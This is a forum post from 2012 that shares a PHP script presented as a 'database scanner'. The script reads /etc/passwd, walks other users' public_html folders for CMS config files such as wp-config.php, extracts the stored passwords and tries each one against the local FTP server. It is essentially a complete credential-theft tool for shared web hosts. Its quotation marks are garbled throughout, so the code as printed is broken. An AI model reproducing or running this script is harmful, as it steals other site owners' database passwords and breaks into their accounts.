io.kent Posted September 24, 2012 Report Posted September 24, 2012 This is a database scanner used to looking for file configuration (file that connects into database CMS application).<?phpecho ***8220;<html>***8221;;echo ***8220;<title>[ Database Scanner]</title><body>***8221;;set_time_limit(0);##################@$passwd=fopen(***8216;/etc/passwd***8217;,'r***8217;);if (!$passwd) {echo ***8220;[-] Error : Can***8217;t read /etc/passwd***8221;;exit;}$path_to_public=array();$users=array();$pathtoconf=array();$i=0;while(!feof($passwd)) {$str=fgets($passwd);if ($i>35) {$pos=strpos($str,***8221;**8221;);$username=substr($str,0,$pos);$dirz=***8221;/home/$username/public_html/***8221;;if (($username!=***8221;")) {if (is_readable($dirz)) {array_push($users,$username);array_push($path_to_public,$dirz);}}}$i++;}############################################echo ***8220;<br><br>***8221;;echo ***8220;<textarea name=***8217;main_window***8217; cols=100 rows=20>***8221;;echo ***8220;[+] Founded ***8220;.sizeof($users).***8221; entrys in /etc/passwd\n***8221;;echo ***8220;[+] Founded ***8220;.sizeof($path_to_public).***8221; readable public_html directories\n***8221;;echo ***8220;[~] Searching for passwords in config.* files***8230;\n\n***8221;;foreach ($users as $user) {$path=***8221;/home/$user/public_html/***8221;;read_dir($path,$user);}echo ***8220;\n[+] Done\n***8221;;function read_dir($path,$username) {if ($handle = opendir($path)) {while (false !== ($file = readdir($handle))) {$fpath=***8221;$path$file***8221;;if (($file!=***8217;.') and ($file!=***8217;..***8217;)) {if (is_readable($fpath)) {$dr=***8221;$fpath/***8221;;if (is_dir($dr)) {read_dir($dr,$username);}else {if (($file==***8217;config.php***8217;) or ($file==***8217;header.inc.php***8217;) or ($file==***8217;content.inc.php***8217;) or ($file==***8217;mainfile.php***8217;) or ($file==***8217;utils.inc.php***8217;) or ($file==***8217;main.php***8217;) or ($file==***8217;config.inc.php***8217;) or ($file==***8217;db.inc.php***8217;) or ($file==***8217;connect.php***8217;) or ($file==***8217;wp-config.php***8217;) or ($file==***8217;var.php***8217;) or ($file==***8217;configure.php***8217;) or ($file==***8217;configuration.php***8217;) or ($file==***8217;configurations.php***8217;) or ($file==***8217;configs.php***8217;) or ($file==***8217;config.locale.php***8217;) or ($file==***8217;db.inc.php***8217;) or ($file==***8217;dbconnect.inc.php***8217;) or ($file==***8217;dbconnection.php***8217;) or ($file==***8217;var.php***8217;) or ($file==***8217;mysql.php***8217;) or ($file==***8217;global.inc.php***8217;) or ($file==***8217;database.php***8217;) or ($file==***8217;dbconnect.php***8217;) or ($file==***8217;conf.php***8217;) or ($file==***8217;configDB.inc.php***8217;) or ($file==***8217;db.php***8217;) or ($file==***8217;db_connect.php***8217;)) {$pass=get_pass($fpath);if ($pass!=***8221;) {echo ***8220;[+] $fpath\n$pass\n***8221;;ftp_check($username,$pass);}}}}}}}}function get_pass($link) {@$config=fopen($link,***8217;r');while(!feof($config)) {$line=fgets($config);if (strstr($line,***8217;pass***8217;) or strstr($line,***8217;password***8217;) or strstr($line,***8217;passwd***8217;)) {if (strrpos($line,***8217;***8221;***8216;))$pass=substr($line,(strpos($line,***8217;=')+3),(strrpos($line,***8217;***8221;***8216;)-(strpos($line,***8217;=')+3)));else$pass=substr($line,(strpos($line,***8217;=')+3),(strrpos($line,***8221;***8216;***8221;)-(strpos($line,***8217;=')+3)));return $pass;}}}function ftp_check($login,$pass) {@$ftp=ftp_connect(***8217;127.0.0.1***8242;);if ($ftp) {@$res=ftp_login($ftp,$login,$pass);if ($res) {echo ***8216;[FTP] ***8216;.$login.***8217;**8217;.$pass.***8221; Success\n***8221;;}else ftp_quit($ftp);}}echo ***8220;</textarea><br>***8221;;echo ***8220;</body></html>***8221;;?> Quote
